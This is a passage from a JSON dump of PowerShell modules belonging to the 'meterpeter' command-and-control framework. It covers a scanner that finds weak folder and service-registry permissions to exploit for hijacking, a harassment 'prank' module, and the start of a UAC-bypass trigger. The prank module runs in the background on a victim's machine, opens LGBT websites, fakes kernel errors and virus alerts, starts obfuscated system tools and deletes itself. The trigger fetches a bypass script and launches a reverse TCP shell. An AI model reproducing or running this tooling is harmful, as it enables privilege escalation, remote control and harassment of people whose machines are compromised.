.NOTES\r\n     If invoked -verb 'true' @argument then cmdlet displays all\r\n     the directory paths beeing scanned in realtime (more_slow)\r\n\r\n   
  If invoked -extraperm 'true' @argument then cmdlet adds extra\r\n     permissions to the 'ACL_Permissions_List' (permission: Write)\r\n\r\n     If invoked -extraGroup 'true' @argument then cmdlet adds one\r\n     extra Group Name to the 'Group_Names_To_Scan_List' : 'Everyone,\r\n     BUILTIN\\Users, DOMAIN\\UserName, NT AUTHORITY\\Authenticated Users'\r\n   #>\r\n\r\n   #ACL Permissions List\r\n   $DirectoryPermission = @(\r\n      \"FullControl\",\"Modify\"\r\n   )\r\n\r\n   If($extraperm -ieq \"True\")\r\n   {\r\n      #-extraperm 'true' add 'Write' permission\r\n      $DirectoryPermission += \"Write\"\r\n   }\r\n   If($extraGroup -ieq \"True\")\r\n   {\r\n      #Add extra Group Name if invoked -extragroup 'string' param\r\n      $FinalGroupList = \"$UserGroup|$UtilGroup|$GroupFdx|$OneMorek\"\r\n   }\r\n   Else\r\n   {\r\n      $FinalGroupList = \"$UserGroup|$UtilGroup|$GroupFdx\"         \r\n   }\r\n\r\n   #Get Environement Paths and split(';') each catched path.\r\n   $EnvironementPaths = ($Env:Path).Split(';') | ? 
{$_ -ne ''}\r\n\r\n   $NewCounter = 0 #Group Name Id\r\n   #Loop trough all '$Environement' catched paths.\r\n   ForEach($TokenPath in $EnvironementPaths)\r\n   {\r\n      #Loop trough all 'ACL Permissions List' Items\r\n      ForEach($ACLPermission in $DirectoryPermission)\r\n      {\r\n         If($Verb -ieq \"True\")\r\n         {\r\n            $NewCounter++\r\n            #Display OnScreen directory paths beeing scanned in realtime\r\n            Write-Host \"[VERBOSE] Scanning: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n            Write-Host \"$TokenPath\" -ForegroundColor Green -BackgroundColor Black;\r\n            write-host \"[VERBOSE] Identity: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n            write-host \"[$NewCounter] $FinalGroupList\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n            Write-Host \" - Permission \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n            Write-Host \"$ACLPermission\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n            Write-Host \".\" -ForegroundColor Blue -BackgroundColor Black;\r\n            Start-Sleep -Milliseconds 100\r\n         }\r\n\r\n         #Get directory ACL settings\r\n         $IsInHerit = (Get-Acl \"$TokenPath\").Access.IsInherited | Select-Object -First 1\r\n         (Get-Acl \"$TokenPath\").Access | Where-Object {#Search for Everyone:(F) \\ Everyone:(M) directory permissions (default)\r\n            $CleanOutput = $_.FileSystemRights -Match \"$ACLPermission\" -and $_.IdentityReference -iMatch \"^($FinalGroupList)$\" ## pt-PT = Todos\r\n\r\n            If($CleanOutput)\r\n            {\r\n               If($Verb -ieq \"True\"){Write-Host \"\"}\r\n               $Count++ #Write the Table 'IF' found any vulnerable permissions\r\n               Write-Host \"VulnId            : ${Count}::ACL (Mitre T1574)\"\r\n               Write-Host \"FolderPath        : $TokenPath\" -ForegroundColor Green 
-BackgroundColor Black\r\n               Write-Host \"FileSystemRights  : $ACLPermission\" -ForegroundColor yellow\r\n               Write-Host \"IdentityReference :\"$_.IdentityReference.ToString()\r\n               Write-Host \"IsInherited       : $IsInHerit`n\"\r\n\r\n               If($logfile -ieq \"True\")\r\n               {\r\n                  $MyReference = $_.IdentityReference.ToString()\r\n                  echo \"VulnId            : ${Count}::ACL (Mitre T1574)\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                  echo \"FolderPath        : $TokenPath\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                  echo \"FileSystemRights  : $ACLPermission\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                  echo \"IdentityReference : $MyReference\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                  echo \"IsInherited       : $IsInHerit`n\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n               }\r\n\r\n            }##End of Table\r\n         }## End of Get-Acl loop\r\n      }##End of the 2º ForEach()\r\n   }##End of the 1º ForEach()\r\n\r\n   If($Count -eq 0)\r\n   {\r\n      Write-Host \"[ ERROR ] none permissions found that match the search criteria.\" -ForegroundColor Red -BackgroundColor Black\r\n      Write-Host \"\"\r\n   }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"dir\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Search in Pre-Defined paths (recursive) for dirs with weak permissions!\r\n\r\n   .NOTES\r\n     If invoked -verb 'true' @argument then cmdlet displays all\r\n     the directory paths beeing scanned in realtime (more_slow)\r\n\r\n     If invoked -extraperm 'true' @argument then cmdlet adds extra\r\n     permissions to the 'ACL_Permissions_List' (permission: Write)\r\n     Remark: extraperm parameter takes a long time to finish ..\r\n\r\n     If invoked -extraGroup 'true' @argument then cmdlet adds one\r\n     extra Group Name to the 'Group_Names_To_Scan_List' : 'Everyone,\r\n     BUILTIN\\Users, NT 
AUTHORITY\\Authenticated Users' Group Names\r\n\r\n     Parameter -scan 'string' scans recursive the inputed\r\n     directory, excluding all pre-defined 'Directorys_To_Scan_List'\r\n   #>\r\n\r\n   #ACL Permissions List\r\n   $DirectoryPermission = @(\r\n      \"FullControl\",\"Modify\"\r\n   )\r\n\r\n   If($extraperm -ieq \"True\")\r\n   {\r\n      #-extraperm 'true' add 'Write' permission\r\n      $DirectoryPermission += \"Write\"\r\n   }\r\n   If($extraGroup -ieq \"True\")\r\n   {\r\n      #Add extra Group Name if invoked -extragroup 'string' param\r\n      $FinalGroupList = \"$UserGroup|$UtilGroup|$OneMorek\"\r\n   }\r\n   Else\r\n   {\r\n      $FinalGroupList = \"$UserGroup|$UtilGroup\"         \r\n   }\r\n\r\n   If($scan -ne \"false\")\r\n   {\r\n      #Make sure User directory input exists\r\n      If(-not(Test-Path -Path \"$scan\" -EA SilentlyContinue))\r\n      {\r\n         $Verb = \"True\"\r\n         If(-not($DirectoryPermission.Contains('Write'))){$DirectoryPermission += \"Write\"}\r\n         Write-Host \"* ERROR: directory not found: '$scan'\" -ForegroundColor Red -BackgroundColor Black\r\n         Write-Host \"  => DEMO: Setting scan to 'Crypto\\RSA\\MachineKeys'..`n\" -ForegroundColor Yellow;Start-Sleep -Seconds 2\r\n         $RawDataBaseList = Get-ChildItem  -Path \"$Env:WINDIR\\System32\\Microsoft\\Crypto\\RSA\" -Recurse -ErrorAction SilentlyContinue -Force | Where-Object {\r\n            $_.PSIsContainer -and $_.FullName -iNotMatch '(.DLL|.EXE)$' } | Select-Object -ExpandProperty FullName\r\n      }\r\n      Else\r\n      {\r\n         #Inputed directory path found [ -scan 'string' ] ..\r\n         #Directorys to search recursive: The directory tree inputed by user!\r\n         $RawDataBaseList = Get-ChildItem  -Path \"$scan\" -Recurse -ErrorAction SilentlyContinue -Force | Where-Object {\r\n            $_.PSIsContainer -and $_.FullName -iNotMatch '(.DLL|.EXE)$' } | Select-Object -ExpandProperty FullName\r\n      }   \r\n   }\r\n   Else\r\n   
{\r\n      #Default directory scans\r\n      #Directorys to search recursive: $Env:PROGRAMFILES, ${Env:PROGRAMFILES(x86)}, $Env:LOCALAPPDATA\\Programs\r\n      $RawDataBaseList = Get-ChildItem  -Path \"$Env:PROGRAMFILES\", \"${Env:PROGRAMFILES(x86)}\", \"$Env:LOCALAPPDATA\\Programs\" -Recurse -ErrorAction SilentlyContinue -Force | Where-Object {\r\n         $_.PSIsContainer -and $_.FullName -iNotMatch '(.DLL|.EXE)$' } | Select-Object -ExpandProperty FullName\r\n\r\n      #Adding extra values to database ^_^ ..\r\n      $RawDataBaseList += \"$Env:WINDIR\\tracing\"\r\n      $RawDataBaseList += \"$Env:WINDIR\\System32\\Tasks\"\r\n      $RawDataBaseList += \"$Env:WINDIR\\System32\\Tasks_Migrated\"\r\n      $RawDataBaseList += \"$Env:WINDIR\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\"\r\n   }\r\n\r\n\r\n   $NewCounter = 0 #Group Name Id\r\n   #Loop trough all ChildItem catched paths\r\n   ForEach($TokenPath in $RawDataBaseList)\r\n   {\r\n      #Exclude 'WindowsApps' from scans\r\n      If(-not($TokenPath -Match 'WindowsApps'))\r\n      {\r\n         #Loop trough all 'ACL Permissions List' Items\r\n         ForEach($ACLPermission in $DirectoryPermission)\r\n         {\r\n            If($Verb -ieq \"True\")\r\n            {\r\n               $NewCounter++\r\n               #Display OnScreen directory paths beeing scanned in realtime\r\n               Write-Host \"[VERBOSE] Scanning: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n               Write-Host \"$TokenPath\" -ForegroundColor Green -BackgroundColor Black;\r\n               write-host \"[VERBOSE] Identity: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n               write-host \"[$NewCounter] $FinalGroupList\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n               Write-Host \" - Permission \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n               Write-Host \"$ACLPermission\" -ForegroundColor DarkGray -BackgroundColor Black 
-NoNewLine;\r\n               Write-Host \".\" -ForegroundColor Blue -BackgroundColor Black;\r\n               Start-Sleep -Milliseconds 100\r\n            }\r\n\r\n            #Get directory ACL settings\r\n            $IsInHerit = (Get-Acl \"$TokenPath\").Access.IsInherited | Select-Object -First 1\r\n            (Get-Acl \"$TokenPath\").Access | Where-Object {#Search for Everyone:(F) \\ Everyone:(M) directory permissions (default)\r\n               $CleanOutput = $_.FileSystemRights -Match \"$ACLPermission\" -and $_.IdentityReference -iMatch \"^($FinalGroupList)$\" ## pt-PT = Todos\r\n\r\n               If($CleanOutput)\r\n               {\r\n                  If($Verb -ieq \"True\"){Write-Host \"\"}\r\n                  $Count++ #Write the Table 'IF' found any vulnerable permissions\r\n                  Write-Host \"VulnId            : ${Count}::ACL (Mitre T1574)\"\r\n                  Write-Host \"FolderPath        : $TokenPath\" -ForegroundColor Green -BackgroundColor Black\r\n                  Write-Host \"FileSystemRights  : $ACLPermission\" -ForegroundColor yellow\r\n                  Write-Host \"IdentityReference :\"$_.IdentityReference.ToString()\r\n                  Write-Host \"IsInherited       : $IsInHerit`n\"\r\n\r\n                  If($logfile -ieq \"True\")\r\n                  {\r\n                     $MyReference = $_.IdentityReference.ToString()\r\n                     echo \"VulnId            : ${Count}::ACL (Mitre T1574)\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                     echo \"FolderPath        : $TokenPath\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                     echo \"FileSystemRights  : $ACLPermission\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                     echo \"IdentityReference : $MyReference\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                     echo \"IsInherited       : $IsInHerit`n\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n                  }\r\n\r\n               }##End of Table\r\n            }## End of Get-Acl 
loop\r\n         }##End of 2º ForEach() loop\r\n      }## End of Exclude WindowsApps\r\n   }## End of the 1º ForEach() loop\r\n\r\n   If($Count -eq 0)\r\n   {\r\n      Write-Host \"[ ERROR ] none permissions found that match the search criteria.\" -ForegroundColor Red -BackgroundColor Black\r\n      Write-Host \"\"\r\n   }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"reg\")\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Search in registry for services with weak permissions!\r\n\r\n   .NOTES\r\n     If invoked -verb 'true' @argument then cmdlet displays all\r\n     the directory paths beeing scanned in realtime (more_slow)\r\n\r\n     If invoked -extraGroup 'true' @argument then cmdlet adds\r\n     two extra Group Names to the 'Group_Names_To_Scan_List':\r\n     'Everyone, BUILTIN\\Users, NT AUTHORITY\\Authenticated Users'\r\n   #>\r\n\r\n   #ACL Group Names List\r\n   $Count = 0 #RegKeysCounter\r\n   $NewCounter = 0 #Group Name Id\r\n   $WeakPerm = @(\"FullControl\")\r\n\r\n   If($extraGroup -ieq \"False\")\r\n   {\r\n      #Defaul Group Name List\r\n      $FinalGroupList = \"$UserGroup\"  \r\n   }\r\n   Else\r\n   {\r\n      $FinalGroupList = @(#Add 2 extra Group Names to List\r\n         \"$UserGroup\",\"$UtilGroup\",\"$OneMorek\"\r\n      )    \r\n   }\r\n\r\n\r\n   ## Get ALL services under HKLM hive key\r\n   $GetPath = (Get-Acl -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\services\\*\" -EA SilentlyContinue).PSPath\r\n   $ParseData = $GetPath -replace 'Microsoft.PowerShell.Core\\\\Registry::HKEY_LOCAL_MACHINE\\\\','HKLM:\\'\r\n   ForEach($Token in $ParseData)\r\n   {\r\n      #Loop trough all 'Group Names List' Items\r\n      ForEach($GroupServiceName in $FinalGroupList)\r\n      {\r\n         ## Loop trough $FinalGroupList services database\r\n         $IsInHerit = (Get-Acl -Path \"$Token\").Access.IsInherited | Select -First 1\r\n         $CleanOutput = (Get-Acl -Path \"$Token\").Access | Select-Object * | Where-Object {## Search 
for Everyone:(F) registry service permissions (default)\r\n            $_.IdentityReference -Match \"^($GroupServiceName)\" -and $_.RegistryRights -Match \"^($WeakPerm)\"\r\n         }\r\n\r\n         If($Verb -ieq \"True\")\r\n         {\r\n            $NewCounter++\r\n            #Display OnScreen registry keys beeing scanned in realtime\r\n            Write-Host \"[VERBOSE] Scanning: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n            Write-Host \"$Token\" -ForegroundColor Green -BackgroundColor Black;\r\n            write-host \"[VERBOSE] Identity: \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n            write-host \"[$NewCounter] $GroupServiceName\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n            Write-Host \" - Permission \" -ForegroundColor Blue -BackgroundColor Black -NoNewLine;\r\n            Write-Host \"$WeakPerm\" -ForegroundColor DarkGray -BackgroundColor Black -NoNewLine;\r\n            Write-Host \".\" -ForegroundColor Blue -BackgroundColor Black;\r\n            Start-Sleep -Milliseconds 100\r\n         }\r\n\r\n         If($CleanOutput)\r\n         {\r\n            If($Verb -ieq \"True\"){Write-Host \"\"}\r\n            $Count++ ##  Write the Table 'IF' found any vulnerable permissions\r\n            Write-Host \"VulnId            : ${Count}::SRV\"\r\n            Write-Host \"RegistryPath      : $Token\" -ForegroundColor Yellow\r\n            Write-Host \"IdentityReference : $GroupServiceName\"\r\n            Write-Host \"RegistryRights    : $WeakPerm\"\r\n            Write-Host \"AccessControlType : Allow -\"$CleanOutput.AccessControlType\r\n            Write-Host \"IsInherited       : $IsInHerit`n\"\r\n\r\n            If($logfile -ieq \"True\")\r\n            {\r\n               echo \"VulnId            : ${Count}::SRV\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n               echo \"RegistryPath      : $Token\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n               echo 
\"IdentityReference : $GroupServiceName\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n               echo \"RegistryRights    : $WeakPerm\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n               echo \"AccessControlType : Allow\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n               echo \"IsInherited       : $IsInHerit`n\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n            }\r\n\r\n         }##End of cleanoutput\r\n      }##End of 2º ForEach()\r\n   }##End of 1º ForEach()\r\n\r\n\r\n   #Report that we have fail to find any permissions.\r\n   If($Count -eq 0 -or $Count -ieq $null)\r\n   {\r\n      $parseData = ($FinalGroupList -split ' ').Count\r\n      If($parseData -gt 1)\r\n      {\r\n         Write-Host \"[REG] None registry services found with FullControl:(F)\" -ForegroundColor Red\r\n         Write-Host \"[ACL] Group: '$OneMorek'\"\r\n         Write-Host \"[ACL] Group: '$UtilGroup'\"\r\n         Write-Host \"[ACL] Group: '$UserGroup'\"\r\n      }\r\n      Else\r\n      {\r\n         Write-Host \"[REG] None services found with ${UserGroup}:(F)\"\r\n      }\r\n      Write-Host \"\"\r\n\r\n      If($logfile -ieq \"True\")\r\n      {\r\n         echo \"[REG] none services found with FullControl:(F) permissions.\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n         echo \"[REG] Groups: '${FinalGroupList}'\" >> $Env:TMP\\Mitre1574-$Rand.log\r\n      }\r\n   }\r\n\r\n}\r\n\r\n\r\n#Internal CmdLet Clock Timmer\r\nIf($Verb -ieq \"True\"){Write-Host \"\"}\r\n$ElapsTime = $(Get-Date) - $ScanStartTimer\r\nIf($scan -ne \"false\"){$Action = \"user_selection\"}\r\n$TotalTime = \"{0:HH:mm:ss}\" -f ([datetime]$ElapsTime.Ticks) #Count the diferense between 'start|end' scan duration!\r\nWrite-Host \"`* ElapsedTime:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"$TotalTime\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\nWrite-Host \" - scantype:\" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\nWrite-Host \"$Action\" -ForegroundColor Green 
-BackgroundColor Black;\r\n\r\nIf($logfile -ieq \"True\")\r\n{\r\n   Write-Host \"* logfile: \" -ForegroundColor Blue -BackgroundColor Black -NoNewline;\r\n   Write-Host \"'$Env:TMP\\Mitre1574-$Rand.log'\" -ForegroundColor Green -BackgroundColor Black;\r\n}\r\n"
  },
  {
    "path": "mimiRatz/C2Prank.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   Powershell Fake [B]SO`D Prank\r\n\r\n   Author: @r00t-3xp10it (ssa redteam)\r\n   Tested Under: Windows 10 (19043) x64 bits\r\n   Required Dependencies: IWR, Media.SoundPlayer {native}\r\n   Optional Dependencies: Critical.wav {auto-download}\r\n   PS cmdlet Dev version: v1.2.13\r\n\r\n.DESCRIPTION\r\n   Auxiliary module of Meterpeter C2 v2.10.14 that executes a prank in background.\r\n   The prank consists in spawning diferent Gay websites on target default browser,\r\n   spawn cmd terminal consoles pretending to be a kernel error while executing an\r\n   sfx sound effect. It also spawns multiple windows system applications.\r\n\r\n.NOTES\r\n   If not declared -wavefile 'file.wav' then cmdlet downloads the main sfx\r\n   sound effect to be played in background loop. If declared then cmdlet uses\r\n   file.wav as main sfx sound effect. However the Parameter declaration only\r\n   accepts file.wav formats ( SoundPlayer File Format Restriction )   \r\n   \r\n.Parameter MaxInteractions\r\n   How many times to loop (default: 20)\r\n\r\n.Parameter DelayTime\r\n   The delay time between each loop (default: 20)\r\n\r\n.Parameter WaveFile\r\n   Accepts the main sfx effect file (default: Critical.wav)\r\n\r\n.Parameter PreventB`SO`D\r\n   Prevent the prank from BS`O`D target? (default: true)\r\n  \r\n.EXAMPLE\r\n   PS C:\\> .\\C2Prank.ps1\r\n   Loops for 20 times max\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\C2Prank.ps1 -MaxInteractions '8'\r\n   Loops for 8 times max with 20 seconds delay\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\C2Prank.ps1 -DelayTime '2'\r\n   Loops for 20 times max with 2 seconds delay\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\C2Prank.ps1 -delaytime '60' -wavefile 'alert.wav'\r\n   Loops for 20 times with 60 seconds of delay + alert.wav as sfx\r\n\r\n.INPUTS\r\n   None. 
You cannot pipe objects into C2Prank.ps1\r\n\r\n.OUTPUTS\r\n   * Powershell Fake B`SOD Prank\r\n     => Download 'Critical error' sfx sound effect\r\n   * maxinteractions: 20 with: 30 (seconds)\r\n   \r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$WaveFile=\"Critical.wav\",\r\n   [string]$PreventBSOD=\"true\",\r\n   [int]$MaxInteractions='20',\r\n   [int]$DelayTime='20'\r\n)\r\n\r\n\r\n## Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n[int]$FinalSfx = $MaxInteractions -1 ## Set the last interaction!\r\nwrite-host \"* Powershell Fake BS`OD Prank\" -ForegroundColor Green\r\n$LasLink = \"https://www.travelgay.pt/destination/gay-portugal/gay-lisbon\"\r\n$UrlLink = \"https://www.travelgay.com/destination/gay-portugal/gay-lisbon\"\r\n$UriLink = \"https://theculturetrip.com/europe/portugal/lisbon/articles/the-top-10-lgbt-clubs-and-bars-in-lisbon\"\r\n\r\n\r\n#Download sound sfx files from my github repository\r\nIf($WaveFile -ieq \"Critical.wav\" -or $WaveFile -iNotMatch '(.wav)$')\r\n{\r\n   If($WaveFile -iNotMatch '(.wav)$')\r\n   {\r\n      $WaveFile = \"Critical.wav\"\r\n      write-host \"x\" -ForegroundColor Red -NoNewline;\r\n      write-host \" error: Cmdlet only accepts .wav formats ..\" -ForegroundColor DarkGray\r\n      write-host \"  => Using default cmdlet sfx sound effect ..\" -ForegroundColor DarkYellow\r\n      Start-Sleep -Seconds 1\r\n   }\r\n\r\n   ## Download 'Critical error' windows sound effect\r\n   write-host \"  => Download 'Critical error' sfx sound effect\" -ForegroundColor DarkYellow\r\n   iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/theme/Critical.wav\" -outfile \"Critical.wav\"|Unblock-File\r\n}\r\n\r\n\r\nIf($PreventBSOD -ieq \"true\")\r\n{\r\n   If($MaxInteractions -gt 200)\r\n   {\r\n      $DelayTime = \"10\"\r\n      [int]$MaxInteractions = 100\r\n      write-host \"x\" 
-ForegroundColor Red -NoNewline\r\n      write-host \" Error: current -maxinteractions parameter will cause BS`OD ..\" -ForegroundColor DarkGray\r\n      write-host \"  => Defaulting -maxinteractions arg to '$MaxInteractions' interactions ..\" -ForegroundColor DarkYellow\r\n   }\r\n}\r\n\r\n\r\n## lOOP Function\r\n$PlayWav = New-Object System.Media.SoundPlayer\r\nwrite-host \"* maxinteractions: $MaxInteractions with: $DelayTime (seconds)\" -ForegroundColor Green\r\nFor($i=1; $i -lt $MaxInteractions; $i++)\r\n{\r\n   #Delay time before playing sfx\r\n   Start-Sleep -Seconds $DelayTime\r\n\r\n   If($i -Match '^(1|3|5|7|9|11|13|15|17|19|21|23|25|27|29|30|40|50|60|70|80|90|97|98|99|100)$')\r\n   {\r\n      #Open Gay website on default browser and play sfx sound\r\n      Start-Process -WindowStyle Maximized \"$UrlLink\"|Out-Null\r\n      $PlayWav.SoundLocation = \"$WaveFile\"\r\n      $PlayWav.playsync();\r\n   }\r\n   ElseIf($i -Match '^(2|4|6|8|10|12|14|16|18|20|22|24|26|28|30|40|50|60|70|80|90|97|98|99|100)$')\r\n   {\r\n      #Open Gay website on default browser and play sfx sound\r\n      Start-Process -WindowStyle Maximized \"$UriLink\"|Out-Null\r\n      $PlayWav.SoundLocation = \"$WaveFile\"\r\n      $PlayWav.playsync();         \r\n   }\r\n   ElseIf($i -Match '^(7|9|12|15|18|21|24|27|30|40|43|47|50|60|62|64|68|70|80|90|97|98|99|100)$')\r\n   {\r\n      #Open Gay website on default browser and play sfx sound\r\n      Start-Process -WindowStyle Maximized \"$LasLink\"|Out-Null\r\n      $PlayWav.SoundLocation = \"$WaveFile\"\r\n      $PlayWav.playsync();         \r\n   }\r\n\r\n   $MsgBoxTitle = \"KERNEL WARNNING 00xf340d0.421\"\r\n   $MsgBoxText = \"Kernel: Critical Error 00xf340d0.421 Memory Corruption!\"\r\n   #Spawn cmd terminal console and make it look like one kernel error as ocurr\r\n   Start-Process cmd.exe -argumentlist \"/R color 90&title $MsgBoxTitle&echo $MsgBoxText&Pause\"\r\n\r\n\r\n   ## Check Operative system version [BallonTip]\r\n   
If(([System.Environment]::OSVersion.Version.Major) -match '^(7|8|8.1|10)$')\r\n   {\r\n      <#\r\n      .SYNOPSIS\r\n         Author: @r00t-3xp10it\r\n         Helper - Display a ballontip in notification area\r\n      #>\r\n\r\n      Add-Type -AssemblyName System.Windows.Forms\r\n      $GlobalShit = \"£N@e£w-O@bj£ec@t S@y£st£e@m.W@in£do@w£s.F£o@rm@s.N@ot£i@fyI@co@n£\" -replace '(@|£)',''\r\n      $global:balmsg = $GlobalShit|&('XeX' -replace '^(X)','i')\r\n      $path = (Get-Process -id $pid).Path\r\n\r\n      ## Build ballon box\r\n      $balmsg.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($path)\r\n      $balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Warning\r\n      $balmsg.BalloonTipText = \"A virus has detected in $Env:COMPUTERNAME\"\r\n      $balmsg.BalloonTipTitle = \"Attention $Env:USERNAME\"\r\n      $balmsg.Visible = $true\r\n      $balmsg.ShowBalloonTip(20000)\r\n   }\r\n\r\n   Start-Sleep -Seconds 1\r\n   Start $Env:PROGRAMFILES\r\n\r\n   If($i -Match '^(3|7|12|13|15|16|18|20|23|27|30|32|33|40|50|60|70|80|90|97|98|99|100)$')\r\n   {\r\n      $HexProcessName = $null\r\n      ## Open drive manager [HEX obfuscated]\r\n      $DeObfuscate = '64 69 73 6B 6D 67 6D 74 2E 6D 73 63'.Split(\" \")|ForEach{[char]([convert]::toint16($_,16))}|ForEach{$HexProcessName=$HexProcessName+$_}\r\n      Start-Process $HexProcessName\r\n   }\r\n   ElseIf($i -Match '^(5|9|14|17|18|19|20|21|25|29|30|40|50|60|70|80|90|97|98|99|100)$')\r\n   {\r\n      $HexProcessName = $null\r\n      #Open firewall manager [HEX obfuscated]\r\n      $DeObfuscate = '66 69 72 65 77 61 6C 6C 2E 63 70 6C'.Split(\" \")|ForEach{[char]([convert]::toint16($_,16))}|ForEach{$HexProcessName=$HexProcessName+$_}\r\n      Start-Process $HexProcessName\r\n   }\r\n   ElseIf($i -Match '^(6|8|9|11|13|15|17|19|20|22|23|24|30|40|50|60|70|80|90|97|98|99|100)$')\r\n   {\r\n      $HexProcessName = $null\r\n      #Open programs manager [HEX obfuscated]\r\n      $DeObfuscate = '61 70 70 77 69 7A 2E 
63 70 6C'.Split(\" \")|ForEach{[char]([convert]::toint16($_,16))}|ForEach{$HexProcessName=$HexProcessName+$_}\r\n      Start-Process $HexProcessName \r\n   }\r\n   ElseIf($i -Match \"^($FinalSfx)$\")\r\n   {\r\n      #Play final sfx sound {Critical error}\r\n      $PlayWav.SoundLocation = \"$WaveFile\"\r\n      $PlayWav.playsync();\r\n   }\r\n\r\n   #Spawn cmd terminal console and make it look like a kernel error has occurred\r\n   Start-Process cmd.exe -argumentlist \"/R color C0&title $MsgBoxTitle&echo $MsgBoxText&Pause\"\r\n\r\n}\r\n\r\n\r\nStart-Sleep -Seconds 1\r\n#Clean artifacts left behind\r\nRemove-Item -Path \"$WaveFile\" -Force\r\nRemove-Item -Path \"$pwd\\hensandrooster.wav\" -Force\r\n\r\n#Spawn alert message box when the loop completes\r\npowershell (New-Object -ComObject Wscript.Shell).Popup(\"$MsgBoxText\",0,\"$MsgBoxTitle\",0+64)|Out-Null\r\n\r\n#Auto Delete this cmdlet in the end ...\r\nRemove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force"
  },
  {
    "path": "mimiRatz/CMSTPTrigger.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   CmdLet to loop UACBypassCMSTP.ps1 execution!\r\n\r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19043) x64 bits\r\n   Required Dependencies: UACBypassCMSTP.ps1 {auto}\r\n   Optional Dependencies: none\r\n   PS cmdlet Dev version: v1.1.5\r\n\r\n.DESCRIPTION\r\n   This cmdlet is a module of the @Meterpeter C2 v2.10.11.15 release that allows\r\n   meterpeter users to elevate session shell privileges from UserLand to Admin.\r\n\r\n.NOTES\r\n   By default it downloads\\executes 'UACBypassCMSTP.ps1' from the %TMP% directory,\r\n   which in turn executes the reverse tcp shell ( only PS1 scripts ) from the\r\n   selected location. That location can be set using the -RatLocation parameter.\r\n\r\n.Parameter DelayTime\r\n   Seconds to delay UACBypassCMSTP.ps1 execution (default: 30)\r\n\r\n.Parameter LoopFor\r\n   How many times to execute the loop function? (default: 2)\r\n\r\n.Parameter RatLocation\r\n   Path of script to exec (default: $Env:TMP\\Update-KB5005101.ps1)\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\CMSTPTrigger.ps1 -DelayTime \"60\"\r\n   Execute 'UACBypassCMSTP.ps1' after 60 seconds.\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\CMSTPTrigger.ps1 -DelayTime \"60\" -LoopFor \"5\"\r\n   Execute UACBypassCMSTP.ps1 every '60' seconds, a max of '5' times.\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\CMSTPTrigger.ps1 -DelayTime \"10\" -LoopFor \"3\" -RatLocation \"$Env:USERPROFILE\\Desktop\\rat.ps1\"\r\n   Execute UACBypassCMSTP.ps1 every '10' seconds, executing -RatLocation '<string>', a max of '3' times.\r\n\r\n.OUTPUTS\r\n   * Elevate session from UserLand to Administrator!\r\n      => Download: UACBypassCMSTP from GitHub into %TMP% ..\r\n\r\n   MaxExec  DelayTime  RatLocation\r\n   -------  ---------  -------------\r\n   2        30(sec)    C:\\Users\\pedro\\AppData\\Local\\Temp\\Update-KB5005101.ps1\r\n\r\n   * Exit @meterpeter and start a new handler to recive the elevated shell.\r\n     => Remenber: To manual delete artifacts from 'TMP' dir 
